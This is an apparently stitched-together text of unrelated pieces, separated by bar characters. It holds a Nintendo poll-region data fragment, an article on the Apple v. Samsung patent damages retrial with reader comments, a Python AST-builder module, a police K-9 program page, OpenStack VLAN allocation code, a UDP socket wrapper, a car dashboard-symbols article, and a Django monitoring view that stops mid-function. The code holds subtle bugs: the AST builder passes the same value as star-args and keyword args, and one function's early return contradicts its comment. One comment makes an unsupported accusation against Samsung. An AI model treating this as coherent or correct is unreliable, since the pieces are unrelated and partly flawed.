position_table[49] = [1, 3, 1, 1, 1, 1, 1, 1, 1, 1, 1, 3, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
position_table[77] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0]
position_table[78] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
position_table[83] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
position_table[94] = [1, 1, 1, 3, 1, 1, 1, 1, 1, 2, 1, 1]
position_table[105] = [1, 1, 1, 1, 3, 5, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
position_table[110] = [1, 2, 2, 1, 1]
"""Data for the position table. Nintendo mixed these up to match the order votes were submitted in (I think)."""
"""That would be more effort to re-arrange the data in the position table, so I just made it read the values only if there is any votes for the region."""
position_data = collections.OrderedDict()
position_data[1] = "A2A4C828AF52B964B478AA64AA73AA87AD9BA5969B96A09EADA5A2A987947F8E78A096A5919B9B8782A591AF82AF7AB978AA6EAA6DB364AF73B96BC05AA546AA55AF4BB437B95FC358BA46C350C82DBE26C623CD2DD237C837D728E14849395A"
position_data[16] = "A4862664E8648E1E4141C873D746CD9E7DA0B4467878B99B8746E35385BEC855C2AEE94D82DC4B6996C8A5AAE3699687E15AA064"
position_data[18] = "87BE3CA009981EA064AAC8C3F0A8E1AAC89BD7C3D4BDAAAA50AF1E695C405649505A3C787841647D8E89"
position_data[21] = "7C7D78739BC8695AAA5A71247D468D6B6E6E579887326946969BC896649B9119782D8C8C4BA58D4864B2677B647328194E19875A733E6E825A87"
position_data[36] = "37508FB0786914465A5A69A54B7D98B69B9E8AAF9687E6A07DAF82918C787DA2649B91B476988BA1EBAA5F7D8CBE91A52B6F67B2A5C8C8C899AE738CC8B9D7B4"
position_data[40] = "A05DAF7B1E7373737D5A739BAA5250823AA0"
position_data[49] = "D25E78D252E748E1AA87917D3C7819645A64E04EDC5FC8A0BE872EE628DF18D98C5A3C46A064AA5F7869B46C9191E249DC64EB37A53FAF5087419169A08C5037D2737337735AE440DC55557D2D5AD746E254B95D7D7D2341CD55E84CC87D714BAA7878914164CD69DC3F272F9B46C3645550F0BE"
position_data[77] = "8246DC465AB49196463CA06E28467864AA46E6E6C86E6E3296C87896C84678C88C14505A8C2D508CC8C8BE96"
position_data[78] = "B95A64966EDC9BC8C86E5F417837AF2D7350467841AA3CBEBE919664781E8C8C"
position_data[83] = "7D822328283C324B463264196432821E64466464786E82649682A08CA0A0BE96B9AABEBE96E63CB4"
position_data[94] = "645AC8418C6496288214B40AAA82D223BE08A0C882B4B46E32C8788232C8"
position_data[105] = "6E5F64E6A03C3C1EF852E65FCA739AD9A7E6B4E1C8E6EBE1641E7878503CC832AA73468C1E32A0968C28781E7832"
position_data[110] = "B4B4738732E67846D71E82B4507D"
"""Number of regions for each country."""
region_number = collections.OrderedDict()
region_number[1] = 47
region_number[10] = 24
region_number[16] = 27
region_number[18] = 13
region_number[20] = 13
region_number[21] = 33
region_number[22] = 7
region_number[25] = 22
region_number[30] = 22
region_number[36] = 32
region_number[40] = 10
region_number[42] = 25
region_number[49] = 52
region_number[52] = 25
region_number[65] = 8
region_number[66] = 9
region_number[67] = 3
region_number[74] = 17
region_number[76] = 6
region_number[77] = 26
region_number[78] = 16
region_number[79] = 13
region_number[82] = 8
region_number[83] = 20
region_number[88] = 3
region_number[94] = 12
region_number[95] = 13
region_number[96] = 5
region_number[97] = 16
region_number[98] = 7
region_number[105] = 17
region_number[107] = 21
region_number[108] = 23
region_number[110] = 5
language_num = collections.OrderedDict()
language_num[0] = "Japanese"
language_num[1] = "English"
language_num[2] = "German"
language_num[3] = "French"
language_num[4] = "Spanish"
language_num[5] = "Italian"
language_num[6] = "Dutch"
language_num[7] = "Portuguese"
language_num[8] = "French Canada"
"""Languages each country uses. The numbers correspond to the ones in the dictionary above."""
country_language = collections.OrderedDict()
country_language[1] = [1]
country_language[10] = [1, 4, 8]
country_language[16] = [1, 4, 7, 8]
country_language[18] = [1, 4, 8]
country_language[20] = [1, 4, 8]
country_language[21] = [1, 4, 8]
country_language[22] = [1, 4, 8]
country_language[25] = [1, 4, 8]
country_language[30] = [1, 4, 8]
country_language[36] = [1, 4, 8]
country_language[40] = [1, 4, 8]
country_language[42] = [1, 4, 8]
country_language[49] = [1, 4, 8]
country_language[52] = [1, 4, 8]
country_language[65] = [1]
country_language[66] = [2, 3, 5, 6]
country_language[67] = [2, 3, 5, 6]
country_language[74] = [1]
country_language[76] = [1]
country_language[77] = [3]
country_language[78] = [2]
country_language[79] = [1, 4, 7]
country_language[82] = [1]
country_language[83] = [5]
country_language[88] = [2, 3, 5, 6]
country_language[94] = [6]
country_language[95] = [1]
country_language[96] = [1]
country_language[97] = [1]
country_language[98] = [1, 4, 7]
country_language[105] = [4]
country_language[107] = [1]
country_language[108] = [2, 3, 5, 6]
country_language[110] = [1]
category_text = collections.OrderedDict()
category_text[0] = "Thoughts"
category_text[1] = "Personality"
category_text[2] = "Surroundings"
category_text[3] = "Experience"
category_text[4] = "Knowledge"
"""Poll categories. The keys correspond to the ones above."""
categories = collections.OrderedDict()
categories[0] = 3
categories[1] = 5
categories[2] = 7
categories[3] = 9
categories[4] = 10
|
According to witness lists filed with the U.S. District Court for the Northern District of California last week, the highest ranking Apple executive set to appear in court is Greg Joswiak, VP of product marketing. Samsung America's SVP of mobile product strategy and marketing Justin Denison is the most notable witness for the Korean tech giant.
Joswiak is expected to discuss Apple's marketing strategy for iPhone, the role patents-in-suit played in said marketing strategy, drivers of demand for both Apple and competitors' devices, and other relevant topics during his time on the stand. Denison will talk about related issues, particularly Samsung device repairability, "holistic design," consumer response to Samsung products and the wider smartphone market.
Richard Howarth, senior director of the Apple Design Team, is also expected to make an appearance at the trial, where he will offer testimony on the company's design process. As a co-inventor of two patents-in-suit, Howarth, like other witnesses, will discuss "article of manufacture," a key issue in the retrial.
Former Apple designer Susan Kare, known for creating icons and fonts for the original Macintosh's graphical user interface, will appear in court to provide expert testimony on icon and GUI design. She will also discuss a patent related to iPhone's home screen, specifically identifying articles of manufacture to which Samsung applied the IP.
As noted by CNET, which reported on the witness lists on Monday, Samsung may call on testimony from Apple CDO Jony Ive and SVP of worldwide marketing Phil Schiller via deposition.
Samsung might also read from depositions provided by former Apple designer Christopher Stringer, former patent chief Boris Teksler and former designer Shin Nishibori.
Apple and Samsung are slated to meet in court on May 14 to kick off a damages retrial. The action stems from Apple's 2012 victory over Samsung, in which a federal jury in the same jurisdiction granted the iPhone maker more than $1 billion in damages after it found Samsung guilty of infringing on various design and utility patents.
Apple's win was significantly whittled down in a subsequent damages retrial. A successful Samsung appeal to the U.S. Court of Appeals for the Federal Circuit, alongside other lower court revisions, brought the figure down to $548 million.
Samsung elevated the case to the Supreme Court, arguing that damages in patent trials should be assigned based on a part or portion of profits attributable to an infringing part, not profits on a complete device.
Previous precedent referenced an "article of manufacture" as an entire device, meaning damages in a patent infringement suit would be calculated based on whole device sales. For products like iPhone, that figure is a gargantuan sum. Instead, Samsung argued damages should be limited only to those parts of a device found in infringement of a plaintiff's patents.
The Supreme Court agreed with Samsung's assessment, and in a unanimous decision in 2016 rewrote the book on how damages can be meted out in U.S. patent cases. However, the highest court in the land, as well as the CAFC, failed to specify guidelines in identifying an appropriate "article of manufacture," and thus handed the case back to trial court for determination.
In the coming trial, Samsung will continue to advocate for a restricted reading of articles of manufacture as it applies to iPhone, seeking to limit the scope of past damages rulings to a small number of individual components. Apple, meanwhile, will seek to prove Samsung's infringement of certain iPhone features is worthy of a more traditional view of article of manufacture.
The damages should have been twice the initial claim. It’s a travesty that they were reduced at all. Samsung’s entire modern telephony business is entirely dependent on what it stole from Apple.
I mean that oxymoron called the US justice system.
Oh my God. Why is this taking a decade to end!
It was reported in Korea that Samsung was behind the mocking of the families of the ferry accident that happened a few a ago. The families were fasting to protest the botched rescue effort when a ferry with hundreds of students sunk. Samsung paid a bunch of right wing goons to mock the fasting families by eating pizza and chicken next to the families of the victims and raising a ruckus. This company is the most vile and disgusting company in the world. All their products should be boycotted. We should urge apple not to use Samsung components in any of the apple products.
Careful there, buddy. Someone’s liable to drag out that old dead horse about Xerox Parc.
Not only dead totally untrue to start with. |
import ast
NoneValue = object()
mappednames = [
False,
True,
NotImplemented,
Ellipsis
]
try:
basestring
except:
basestring = (str, bytes)
numbers = (int, float)
def coerce(obj):
if any(i is obj for i in mappednames):
return Name(str(obj))
if obj is NoneValue:
return Name('None')
if isinstance(obj, basestring):
return Str(obj)
if isinstance(obj, numbers):
return Num(obj)
if isinstance(obj, list):
return List(obj)
if isinstance(obj, dict):
return Dict(obj)
if isinstance(obj, tuple):
return Tuple(obj)
return obj
def coerce_list(obj):
return [ coerce(i) for i in obj ]
def coerce_dict(obj, valuesonly=False):
kcoerce = coerce
if valuesonly:
kcoerce = lambda x: x
return { kcoerce(k): coerce(v) for (k, v) in obj.items() }
def maybe_ast(obj):
if obj is None:
return
return obj._get_ast()
def _get_list_ast(obj):
return [ i._get_ast() for i in obj ]
class AstNode(object):
def _make_lvalue(self):
raise TypeError("Cannot make an lvalue of %s (non-expression)" % self.__class__.__name__)
class Expression(AstNode):
def __call__(self, *a, **kw):
return Call(self, *a, **kw)
def _assign(self, value):
return Assign(self, value)
def __getattr__(self, name):
return Attribute(self, name)
def _make_lvalue(self):
raise TypeError("Cannot make an lvalue of %s" % self.__class__.__name__)
class Statement(AstNode):
pass
def make_statement(node):
if isinstance(node, Expression):
return Expr(node)
return node
class Expr(Statement):
def __init__(self, value):
self.value = coerce(value)
def _get_ast(self):
return ast.Expr(self.value._get_ast())
class Num(Expression):
def __init__(self, n=None):
self.n = n
def _get_ast(self):
return ast.Num(self.n)
class Str(Expression):
def __init__(self, s=None):
self.s = s
def _get_ast(self):
return ast.Str(s=self.s)
class Assign(Statement):
def __init__(self, target, source):
self.target = target._make_lvalue()
self.source = coerce(source)
def _get_ast(self):
return ast.Assign(
[ self.target._get_ast() ],
self.source._get_ast()
)
class Call(Expression):
def __init__(self, func, *a, **kw):
self.func = func
self.a = None
self.kw = None
if '_kwargs' in kw:
self.kw = coerce_dict(kw.pop('_kwargs'))
if '_args' in kw:
self.a = coerce_list(kw.pop('_args'))
self.args = coerce_list(a)
self.kwargs = coerce_dict(kw, valuesonly=True)
def _get_ast(self):
kwlist = []
for k, v in self.kwargs.items():
kwlist.append(ast.keyword(
arg=k,
value=v._get_ast()
))
return ast.Call(
func=self.func._get_ast(),
args=_get_list_ast(self.args),
keywords=kwlist,
starargs=maybe_ast(self.a),
kwargs=maybe_ast(self.a)
)
ctx_type_to_factory = {
'load': ast.Load,
'store': ast.Store
}
class Name(Expression):
def __init__(self, id=None, ctx='load'):
if not isinstance(id, str):
id = id.decode('UTF-8')
self.name = id
self.ctx = ctx
def _make_lvalue(self):
return Name(id=self.name, ctx='store')
def _get_ast(self):
ctx = ctx_type_to_factory[self.ctx]()
return ast.Name(self.name, ctx)
class Attribute(Expression):
def __init__(self, value=None, attr=None, ctx='load'):
self.value = coerce(value)
self.attr = attr
self.ctx = ctx
def _make_lvalue(self):
return Attribute(self.value, self.attr, 'store')
def _get_ast(self):
ctx = ctx_type_to_factory[self.ctx]()
return ast.Attribute(self.value._get_ast(), self.attr, ctx)
class Dict(Expression):
def __init__(self, value=None):
value = value or {}
keys = []
values = []
for k, v in value.items():
keys.append(k)
values.append(v)
self.keys = coerce_list(keys)
self.values = coerce_list(values)
def _get_ast(self):
return ast.Dict(_get_list_ast(self.keys), _get_list_ast(self.values))
class Tuple(Expression):
def __init__(self, value=None, ctx='load'):
value = list(value) or []
self.values = coerce_list(value)
self.ctx = ctx
def _get_ast(self):
ctx = ctx_type_to_factory[self.ctx]()
return ast.Tuple(_get_list_ast(self.values), ctx)
def _make_lvalue(self):
return Tuple([ i._make_lvalue() for i in self.values ], 'store')
class List(Expression):
def __init__(self, value=None, ctx='load'):
value = value or []
self.values = coerce_list(value)
self.ctx = ctx
def _get_ast(self):
ctx = ctx_type_to_factory[self.ctx]()
return ast.List(_get_list_ast(self.values), ctx)
def _make_lvalue(self):
return List([ i._make_lvalue() for i in self.values ], 'store')
try:
from collections.abc import MutableSequence
except ImportError:
from collections import MutableSequence
class StatementList(MutableSequence):
def __init__(self, initial=None):
self.list = []
if initial:
self += initial
def coerce(self, o):
return make_statement(o)
def __getitem__(self, i):
return self.list[i]
def __setitem__(self, i, v):
self.list[i] = self.coerce(v)
def __delitem__(self, i):
del self.list[i]
def __len__(self):
return len(self.list)
def insert(self, i, o):
return self.list.insert(i, self.coerce(o))
def __iadd__(self, value):
if isinstance(value, AstNode):
self.append(value)
else:
super(StatementList, self).__iadd__(value)
return self
class For(Statement):
def __init__(self, vars=None, iterable=None, body=[], orelse=[]):
self.body = StatementList(body)
self.orelse = StatementList(orelse)
self.vars = vars
self.iterable = coerce(iterable)
@property
def vars(self):
return self._vars
@vars.setter
def vars(self, value):
if value is not None:
value = coerce(value)._make_lvalue()
self._vars = value
def _get_ast(self):
return ast.For(
self._vars._get_ast(),
self.iterable._get_ast(),
_get_list_ast(self.body),
_get_list_ast(self.orelse)
)
class If(Statement):
def __init__(self, condition=None, body=[], orelse=[]):
self.body = StatementList(coerce_list(body))
self.orelse = StatementList(coerce_list(orelse))
self.condition = coerce(condition)
def _get_ast(self):
return ast.If(
self.condition._get_ast(),
_get_list_ast(self.body),
_get_list_ast(self.orelse)
)
class Return(Statement):
def __init__(self, expression=None):
self.expression = coerce(expression)
def _get_ast(self):
return ast.Return(self.expression._get_ast())
if __name__ == '__main__':
forri = For(Name('a'), [ 1, 2, 3 ])
forri.body += Name('print')(Name('a'))
iffi = If(True)
iffi.body += forri
tree = iffi._get_ast()
print(ast.dump(tree))
import astor
print(astor.codegen.to_source(tree))
|
The Lakeway Police Department K-9 Program was established in 2013 with the addition of K-9 "Orka", who was donated to the department by the Austin Police Department. From that point, the program was expanded with the addition of K-9 "Cory" who was purchased and trained with the financial assistance of the Lakeway Police Foundation. Both K-9s and their respective handlers were trained and certified by the National Narcotics Detector Dog Association in the detection of various narcotics including, but not limited to: cocain, marijuana, methamphetamine, and heroin. The K-9s also received basic training in tracking, which provided LPD with the ability to track/search for fleeing fugitives and missing persons.
Since, "Orka" has retired after a long and successful law enforcement tenure. A new addition to the Police Department was recently made with the donation of K-9 "Rino". Lakeway citizen and recent citizens police academy graduate, Melanie DeMayo, made a very generous financial donation to the Lakeway Police Foundation for the sole purpose of acquiring a new police dog. “Rino” will be trained in drug detection and tracking skills. His training will last for 5-6 weeks and then he will come to his new handler, LPD Officer Gilbert Hernandez, for additional training and acclimation. Officer Hernadez is a retired Travis County deputy and master K-9 handler/trainer who recently joined LPD. We expect our newest K-9 team to be on patrol in August 2018.
K-9 "Cory" is assigned to Patrol Officer Sheldon Banta who, in addition to normal patrol functions, is responsible for seeking out those who are in possession of illicit narcotics and/or drug paraphernalia in Lakeway. K-9 "Cory" and her handler are also tasked with public appearances at local schools and other community events in the Lake Travis area. |
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log
from six import moves
import sqlalchemy as sa
from neutron._i18n import _LE, _LI, _LW
from neutron.common import exceptions as exc
from neutron.db import api as db_api
from neutron.db import model_base
from neutron.plugins.common import constants as p_const
from neutron.plugins.common import utils as plugin_utils
from neutron.plugins.ml2.drivers import helpers
LOG = log.getLogger(__name__)
class L3OutVlanAllocation(model_base.BASEV2):
"""Represent allocation state of a vlan_id for the L3 out per VRF.
If allocated is False, the vlan_id is available for allocation.
If allocated is True, the vlan_id is in use.
When an allocation is released, if the vlan_id is inside the pool
described by network_vlan_ranges, then allocated is set to
False. If it is outside the pool, the record is deleted.
"""
__tablename__ = 'apic_ml2_l3out_vlan_allocation'
__table_args__ = (
sa.Index('apic_ml2_l3out_vlan_allocation_l3out_network_allocated',
'l3out_network', 'allocated'),
model_base.BASEV2.__table_args__,)
l3out_network = sa.Column(sa.String(64), nullable=False,
primary_key=True)
vrf = sa.Column(sa.String(64), nullable=False,
primary_key=False)
vlan_id = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False)
class NoVlanAvailable(exc.ResourceExhausted):
message = _("Unable to allocate the vlan. "
"No vlan is available for %(l3out_network)s external network")
# inherit from SegmentTypeDriver to reuse the code to reserve/release
# vlan IDs from the pool
class L3outVlanAlloc(helpers.SegmentTypeDriver):
def __init__(self):
super(L3outVlanAlloc, self).__init__(L3OutVlanAllocation)
def _parse_vlan_ranges(self, ext_net_dict):
self.l3out_vlan_ranges = {}
for l3out_network in ext_net_dict.keys():
try:
ext_info = ext_net_dict.get(l3out_network)
vlan_ranges_str = ext_info.get('vlan_range')
if vlan_ranges_str:
vlan_ranges = vlan_ranges_str.strip().split(',')
for vlan_range_str in vlan_ranges:
vlan_min, vlan_max = vlan_range_str.strip().split(':')
vlan_range = (int(vlan_min), int(vlan_max))
plugin_utils.verify_vlan_range(vlan_range)
self.l3out_vlan_ranges.setdefault(
l3out_network, []).append(vlan_range)
except Exception:
LOG.exception(_LE("Failed to parse vlan_range for L3out %s"),
l3out_network)
LOG.info(_LI("L3out VLAN ranges: %s"), self.l3out_vlan_ranges)
def sync_vlan_allocations(self, ext_net_dict):
session = db_api.get_session()
self._parse_vlan_ranges(ext_net_dict)
with session.begin(subtransactions=True):
# get existing allocations for all L3 out networks
allocations = dict()
allocs = (session.query(L3OutVlanAllocation).
with_lockmode('update'))
for alloc in allocs:
if alloc.l3out_network not in allocations:
allocations[alloc.l3out_network] = set()
allocations[alloc.l3out_network].add(alloc)
# process vlan ranges for each configured l3out network
for (l3out_network,
vlan_ranges) in self.l3out_vlan_ranges.items():
# determine current configured allocatable vlans for
# this l3out network
vlan_ids = set()
for vlan_min, vlan_max in vlan_ranges:
vlan_ids |= set(moves.xrange(vlan_min, vlan_max + 1))
# remove from table unallocated vlans not currently
# allocatable
if l3out_network in allocations:
for alloc in allocations[l3out_network]:
try:
# see if vlan is allocatable
vlan_ids.remove(alloc.vlan_id)
except KeyError:
# it's not allocatable, so check if its allocated
if not alloc.allocated:
# it's not, so remove it from table
LOG.debug("Removing vlan %(vlan_id)s on "
"l3out network "
"%(l3out_network)s from pool",
{'vlan_id': alloc.vlan_id,
'l3out_network':
l3out_network})
session.delete(alloc)
del allocations[l3out_network]
# add missing allocatable vlans to table
for vlan_id in sorted(vlan_ids):
alloc = L3OutVlanAllocation(l3out_network=l3out_network,
vrf='',
vlan_id=vlan_id,
allocated=False)
session.add(alloc)
# remove from table unallocated vlans for any unconfigured
# l3out networks
for allocs in allocations.itervalues():
for alloc in allocs:
if not alloc.allocated:
LOG.debug("Removing vlan %(vlan_id)s on l3out "
"network %(l3out_network)s from pool",
{'vlan_id': alloc.vlan_id,
'l3out_network':
alloc.l3out_network})
session.delete(alloc)
def get_type(self):
return p_const.TYPE_VLAN
def reserve_vlan(self, l3out_network, vrf, vrf_tenant=None):
vrf_db = L3outVlanAlloc._get_vrf_name_db(vrf, vrf_tenant)
session = db_api.get_session()
with session.begin(subtransactions=True):
query = (session.query(L3OutVlanAllocation).
filter_by(l3out_network=l3out_network,
vrf=vrf_db))
count = query.update({"allocated": True})
if count:
LOG.debug("reserving vlan %(vlan_id)s for vrf "
"%(vrf)s on l3out network %(l3out_network)s from "
"pool. Totally %(count)s rows updated.",
{'vlan_id': query[0].vlan_id,
'vrf': vrf_db,
'l3out_network': l3out_network,
'count': count})
return query[0].vlan_id
# couldn't find this vrf, allocate vlan from the pool
# then update the vrf field
filters = {}
filters['l3out_network'] = l3out_network
alloc = self.allocate_partially_specified_segment(
session, **filters)
if not alloc:
raise NoVlanAvailable(l3out_network=l3out_network)
filters['vlan_id'] = alloc.vlan_id
query = (session.query(L3OutVlanAllocation).
filter_by(allocated=True, **filters))
count = query.update({"vrf": vrf_db})
if count:
LOG.debug("updating vrf %(vrf)s vlan "
"%(vlan_id)s on l3out network %(l3out_network)s to "
"pool. Totally %(count)s rows updated.",
{'vrf': vrf_db,
'vlan_id': alloc.vlan_id,
'l3out_network': l3out_network,
'count': count})
LOG.debug("reserving vlan %(vlan_id)s "
"on l3out network %(l3out_network)s from pool",
{'vlan_id': alloc.vlan_id,
'l3out_network': l3out_network})
return alloc.vlan_id
def release_vlan(self, l3out_network, vrf, vrf_tenant=None):
vrf_db = L3outVlanAlloc._get_vrf_name_db(vrf, vrf_tenant)
session = db_api.get_session()
with session.begin(subtransactions=True):
query = (session.query(L3OutVlanAllocation).
filter_by(l3out_network=l3out_network,
vrf=vrf_db))
count = query.update({"allocated": False})
if count:
LOG.debug("Releasing vlan %(vlan_id)s on l3out "
"network %(l3out_network)s to pool. "
"Totally %(count)s rows updated.",
{'vlan_id': query[0].vlan_id,
'l3out_network': l3out_network,
'count': count})
return
LOG.warning(_LW("No vlan_id found for vrf %(vrf)s on l3out "
"network %(l3out_network)s"),
{'vrf': vrf_db,
'l3out_network': l3out_network})
# None is returned if not found
@staticmethod
def get_vlan_allocated(l3out_network, vrf, vrf_tenant=None):
session = db_api.get_session()
query = (session.query(L3OutVlanAllocation).
filter_by(l3out_network=l3out_network,
vrf=L3outVlanAlloc._get_vrf_name_db(
vrf, vrf_tenant),
allocated=True))
if query.count() > 0:
return query[0].vlan_id
@staticmethod
def _get_vrf_name_db(vrf, vrf_tenant):
return vrf_tenant and ("%s/%s" % (vrf_tenant, vrf)) or vrf
def initialize(self):
return
def is_partial_segment(self, segment):
return True
def validate_provider_segment(self, segment):
return
def reserve_provider_segment(self, session, segment):
return
def allocate_tenant_segment(self, session):
return
def release_segment(self, session, segment):
return
|
At Maravanthe in coastal Karnataka, the narrow strip of land (as seen in the above picture) has the backwaters of Sowparnika river on one side and the Arabian sea on the other.
Wow good connectivity with road.
Yeah, it's a nice long stretch.
Glad you liked it. Have sent you a mail. |
#!/usr/bin/env python3
#
# NAME
#
# dgmsocket class
#
# DESCRIPTION
#
# The 'dgmsocket' class provides a very simple wrapper the standard
# python socket API.
#
# More specifically, this class provides datagram socket services.
#
# HISTORY
#
# 25 March 2006
# o Initial development implementation
#
# 06 December 2011
# o Clean-up the socket communication
#
import socket
class C_dgmsocket :
#
# Member variables
#
# - Core variables
mstr_obj = 'C_dgmsocket' # name of object class
mstr_name = 'void' # name of object variable
m_id = -1 # id of agent
m_iter = 0 # current iteration in an
# arbitrary processing
# scheme
m_verbosity = 0 # debug related value for
# object
m_warnings = 0 # show warnings
# (and warnings level)
#
# - Class variables
m_dgmsocket = None
mstr_remoteHost = 'localhost'
m_port = 1701
#
# Methods
#
# Core methods - construct, initialise, id
def core_construct( self,
astr_obj = 'C_dgmsocket',
astr_name = 'void',
a_id = -1,
a_iter = 0,
a_verbosity = 0,
a_warnings = 0) :
self.mstr_obj = astr_obj
self.mstr_name = astr_name
self.m_id = a_id
self.m_iter = a_iter
self.m_verbosity = a_verbosity
self.m_warnings = a_warnings
def __str__(self):
print('mstr_obj\t\t= %s' % self.mstr_obj)
print('mstr_name\t\t= %s' % self.mstr_name)
print('m_id\t\t\t= %d' % self.m_id)
print('m_iter\t\t\t= %d' % self.m_iter)
print('m_verbosity\t\t= %d' % self.m_verbosity)
print('m_warnings\t\t= %d' % self.m_warnings)
return 'This class provides a *very* simple wrapper framework about datagram sockets.'
def __init__(self, astr_hostname = 'localhost', a_port = 1701):
self.core_construct()
self.mstr_remoteHost = astr_hostname
self.m_port = a_port
self.m_dgmsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def tx(self, str_payload):
self.m_dgmsocket.sendto(str_payload.encode(), (self.mstr_remoteHost, self.m_port))
def write(self, str_payload):
self.m_dgmsocket.sendto(str_payload.encode(), (self.mstr_remoteHost, self.m_port))
def close(self):
self.m_dgmsocket.close()
def flush(self):
pass
|
Confusing cars: how well do you really know your dashboard?
Do you know your air con symbol from your air bag warning light? New research has found that 70% of drivers don’t understand all the symbols on their dashboard, while one in ten admit they hardly know what any of them mean.
The research was carried out by back-to-basics brand Dacia, that also discovered 84% of the population believe that gadgets have become too complicated, with less than a quarter able to use all of their cars’ functions.
Ignorant motorists aren’t new – a 2013 survey by Britannia Rescue asked drivers about warning symbols, and revealed that around 35% of people don’t recognise an airbag warning, while 71% of motorists are confused by a tyre pressure warning light, with 25% believing it related to the brakes.
But it’s not just warning symbols that’s the problem. Infotainment systems, satnav and other connectivity features have added a plethora of symbols, while hybrid drive systems and the emergence of self-driving cars will no doubt add more warnings and tech.
As well as a lack of awareness regarding warning lights, motorists also admitted they only use two thirds of available settings in their car – surprising considering the ever-increasing levels of tech that’s on offer such as infotainment systems.
More gadgets mean more warning lights too, with satnav and infotainment settings giving the motorists even more symbols to decode. So, considering that only 10% of drivers can identify symbols for headlights, horn and air conditioning, is increasing levels of tech a great idea?
Part of Dacia’s appeal is its back-to-basics approach when it comes to tech, but for the majority of manufacturers infotainment systems and other forms of tech are high on the agenda – just take a look at the futuristic cabin of the latest Audi A8.
Do you know all of your car’s warning lights? Should manufacturers make things easier to understand, or is it our own responsibility to know what they all mean? Let us know in the comments! |
# Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import copy
import json
import logging
from django.conf import settings
from django.contrib import messages
from django import http
from django.http import HttpResponse
from django.urls import reverse_lazy
from django.utils.translation import ugettext_lazy as _ # noqa
from django.views.decorators.csrf import csrf_exempt
from django.views import generic
from django.views.generic import TemplateView
from horizon import exceptions
from openstack_auth import utils as auth_utils
from openstack_dashboard import policy
import urllib
from monitoring.alarms import tables as alarm_tables
from monitoring import api
from monitoring.overview import constants
LOG = logging.getLogger(__name__)
STATUS_FA_ICON_MAP = {'btn-success': "fa-check",
'btn-danger': "fa-exclamation-triangle",
'btn-warning': "fa-exclamation",
'btn-default': "fa-question-circle"}
def get_icon(status):
return STATUS_FA_ICON_MAP.get(status, "fa-question-circle")
priorities = [
{'status': 'btn-success', 'severity': 'OK'},
{'status': 'btn-default', 'severity': 'UNDETERMINED'},
{'status': 'btn-warning', 'severity': 'LOW'},
{'status': 'btn-warning', 'severity': 'MEDIUM'},
{'status': 'btn-warning', 'severity': 'HIGH'},
{'status': 'btn-danger', 'severity': 'CRITICAL'},
]
index_by_severity = {d['severity']: i for i, d in enumerate(priorities)}
def get_dashboard_links(request):
#
# GRAFANA_LINKS is a list of dictionaries, but can either
# be a nested list of dictionaries indexed by project name
# (or '*'), or simply the list of links to display. This
# code is a bit more complicated as a result but will allow
# for backward compatibility and ensure existing installations
# that don't take advantage of project specific dashboard
# links are unaffected. The 'non_project_keys' are the
# expected dictionary keys for the list of dashboard links,
# so if we encounter one of those, we know we're supporting
# legacy/non-project specific behavior.
#
# See examples of both in local_settings.py
#
non_project_keys = {'fileName', 'title'}
try:
for project_link in settings.DASHBOARDS:
key = list(project_link)[0]
value = list(project_link.values())[0]
if key in non_project_keys:
#
# we're not indexed by project, just return
# the whole list.
#
return settings.DASHBOARDS
elif key == request.user.project_name:
#
# we match this project, return the project
# specific links.
#
return value
elif key == '*':
#
# this is a global setting, squirrel it away
# in case we exhaust the list without a project
# match
#
return value
return settings.DEFAULT_LINKS
except Exception:
LOG.warning("Failed to parse dashboard links by project, returning defaults.")
pass
#
# Extra safety here -- should have got a match somewhere above,
# but fall back to defaults.
#
return settings.DASHBOARDS
def get_monitoring_services(request):
#
# GRAFANA_LINKS is a list of dictionaries, but can either
# be a nested list of dictionaries indexed by project name
# (or '*'), or simply the list of links to display. This
# code is a bit more complicated as a result but will allow
# for backward compatibility and ensure existing installations
# that don't take advantage of project specific dashboard
# links are unaffected. The 'non_project_keys' are the
# expected dictionary keys for the list of dashboard links,
# so if we encounter one of those, we know we're supporting
# legacy/non-project specific behavior.
#
# See examples of both in local_settings.py
#
non_project_keys = {'name', 'groupBy'}
try:
for group in settings.MONITORING_SERVICES:
key = list(group.keys())[0]
value = list(group.values())[0]
if key in non_project_keys:
#
# we're not indexed by project, just return
# the whole list.
#
return settings.MONITORING_SERVICES
elif key == request.user.project_name:
#
# we match this project, return the project
# specific links.
#
return value
elif key == '*':
#
# this is a global setting, squirrel it away
# in case we exhaust the list without a project
# match
#
return value
return settings.MONITORING_SERVICES
except Exception:
LOG.warning("Failed to parse monitoring services by project, returning defaults.")
pass
#
# Extra safety here -- should have got a match somewhere above,
# but fall back to defaults.
#
return settings.MONITORING_SERVICES
def show_by_dimension(data, dim_name):
if 'metrics' in data:
dimensions = []
for metric in data['metrics']:
if 'dimensions' in metric:
if dim_name in metric['dimensions']:
dimension = metric['dimensions'][dim_name]
dimensions.append(dimension)
return dimensions
return []
def get_status(alarms):
if not alarms:
return 'chicklet-notfound'
